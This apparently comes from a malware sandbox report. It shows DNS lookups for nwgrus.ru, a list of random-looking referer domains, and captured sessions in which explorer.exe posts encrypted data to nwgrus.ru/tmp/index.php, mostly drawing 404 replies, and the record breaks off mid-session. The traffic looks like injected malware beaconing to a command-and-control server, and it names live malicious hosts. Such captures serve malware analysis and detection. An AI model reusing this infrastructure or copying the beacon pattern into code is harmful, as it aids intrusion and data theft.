                                      Oct 13, 2024 18:27:44.320143938 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru148.230.249.9A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320143938 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru185.12.79.25A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320143938 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru189.61.54.32A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320143938 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320143938 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru123.213.233.131A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320143938 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru190.219.117.240A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320143938 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru190.156.239.49A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320143938 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru211.181.24.133A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320143938 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru175.119.10.231A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320143938 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru109.175.29.39A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320195913 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru148.230.249.9A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320195913 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru185.12.79.25A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320195913 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru189.61.54.32A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320195913 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320195913 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru123.213.233.131A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320195913 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru190.219.117.240A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320195913 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru190.156.239.49A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320195913 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru211.181.24.133A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320195913 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru175.119.10.231A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320195913 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru109.175.29.39A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320225954 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru148.230.249.9A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320225954 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru185.12.79.25A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320225954 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru189.61.54.32A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320225954 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320225954 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru123.213.233.131A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320225954 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru190.219.117.240A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320225954 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru190.156.239.49A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320225954 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru211.181.24.133A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320225954 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru175.119.10.231A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.320225954 CEST1.1.1.1192.168.2.40x43c9No error (0)nwgrus.ru109.175.29.39A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008795977 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru190.156.239.49A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008795977 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru130.204.29.121A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008795977 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru187.204.42.174A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008795977 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru2.185.214.11A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008795977 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru154.144.253.197A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008795977 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru201.212.52.197A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008795977 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru211.171.233.126A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008795977 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru190.187.52.42A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008795977 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru116.58.10.60A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008795977 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru190.249.249.14A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008842945 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru190.156.239.49A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008842945 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru130.204.29.121A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008842945 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru187.204.42.174A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008842945 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru2.185.214.11A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008842945 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru154.144.253.197A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008842945 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru201.212.52.197A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008842945 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru211.171.233.126A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008842945 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru190.187.52.42A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008842945 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru116.58.10.60A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008842945 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru190.249.249.14A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008871078 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru190.156.239.49A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008871078 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru130.204.29.121A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008871078 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru187.204.42.174A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008871078 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru2.185.214.11A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008871078 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru154.144.253.197A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008871078 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru201.212.52.197A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008871078 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru211.171.233.126A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008871078 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru190.187.52.42A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008871078 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru116.58.10.60A (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:20.008871078 CEST1.1.1.1192.168.2.40x3f9No error (0)nwgrus.ru190.249.249.14A (IP address)IN (0x0001)false
                                      • oiwjgaljhmhwar.com
                                        • nwgrus.ru
                                      • upppthvngavhg.org
                                      • xbxjiiplcauibu.com
                                      • uowfkuajgbrsxf.com
                                      • bsujqjcrhguj.com
                                      • akxpcpdhnwlcvewi.net
                                      • yvuudhqxndfwr.net
                                      • fgueognrgcdryprb.net
                                      • hvywquxnrrbp.org
                                      • cacpihwweubtsxg.net
                                      • rqcdsrhbxdj.org
                                      • llagbnlopmmumxog.net
                                      • kdhqngbaswv.org
                                      • ttjnxnssovi.org
                                      • mxvsopepyhexw.net
                                      • icsnyxejpjswt.net
                                      • ofymhpccvbs.net
                                      • bysfflokkqfepm.org
                                      • jktwhgejoiledxll.net
                                      • dixscrvatda.net
                                      • mjtbwlnoxuan.org
                                      • sndnvyniffwfhh.net
                                      • vedtfnbjotxnqis.net
                                      • ijwwxiabyxki.org
                                      • wqfylsyerupgn.com
                                      • oqlpckrtfgisr.org
                                      • vybahkmcxnemgwbs.net
                                      • mmuqkomgbgwmrgx.net
                                      • lpffbcdshmrgy.net
                                      • espuvwcpdtgkhr.net
                                      • qjhgyfigxhdukho.net
                                      • qbdfqckmklgu.net
                                      • rccfvowoiuloot.net
                                      • oxmwgvysvdebn.com
                                      • liapcosrblojgddt.com
                                      • kargncdaxawnud.com
                                      • fmwnhyofuij.net
                                      • rihjcvuphiddchm.com
                                      • oqytxooojaw.net
                                      • vgkkdltoovhgj.org
                                      • judwwmqxinxkj.org
                                      • tcjadfthgiofpvtt.org
                                      • phfffsllnpice.net
                                      • ripegxsqlidtbjlk.com
                                      • siolcmqbegyqsn.org
                                      • xwvgudwewoih.net
                                      • cpcybixettuxhrkt.net
                                      • gixrpkowgjh.org
                                      • voqchluhblp.org
                                      • wxvosrmogsfitpw.net
                                      • pxipmfrupftaxri.net
                                      • piulubiplhrouqkj.net
                                      • ynnjyahqefoad.com
                                      • gtsvsrpyerihmcqc.org
                                      • qkfisicqugofkqpv.net
                                      • abelcascgtcbciky.net
                                      • pcjiyoflornot.net
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.464968148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:27:44.338875055 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://oiwjgaljhmhwar.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 222
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:27:44.338875055 CEST222OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 28 46 bd 89
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vu(F^~Mm>A<>lgY;qg84/ecON@c-9~'OUtR{zianPo^aX5
                                      Oct 13, 2024 18:27:45.302810907 CEST152INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:27:45 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 04 00 00 00 72 e8 87 e9
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.464969148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:27:45.331068039 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://upppthvngavhg.org/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 123
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:27:45.331068039 CEST123OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 27 53 a5 eb
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu'SO9VpA>#-}4?L?
                                      Oct 13, 2024 18:27:46.963160038 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:27:46 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                      Oct 13, 2024 18:27:46.963268042 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:27:46 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                      Oct 13, 2024 18:27:46.967463017 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:27:46 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.464970148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:27:46.976579905 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://xbxjiiplcauibu.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 126
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:27:46.976579905 CEST126OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 23 36 e9 ec
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu#6okY'D7_VL)a
                                      Oct 13, 2024 18:27:47.918625116 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:27:47 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.464971148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:27:47.928205967 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://uowfkuajgbrsxf.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 306
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:27:47.929371119 CEST306OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 53 46 aa fc
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vuSF[VoCQdCt^MU.5V"]1[Tv.};C-,M9gEOyeal&\:gX8gfuH~!|6x+C
                                      Oct 13, 2024 18:27:48.893680096 CEST137INHTTP/1.1 200 OK
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:27:48 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.464972148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:27:48.933195114 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://bsujqjcrhguj.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 112
                                      Host: nwgrus.ru
                                      Oct 13, 2024 18:27:48.933260918 CEST112OUTData Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 7f 22 db f9
                                      Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[k,vu"m[k@y`dsJnaX
                                      Oct 13, 2024 18:27:49.898473024 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Sun, 13 Oct 2024 16:27:49 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.464973148.230.249.9802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 13, 2024 18:27:49.911473989 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://akxpcpdhnwlcvewi.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 226
                                      Host: nwgrus.ru
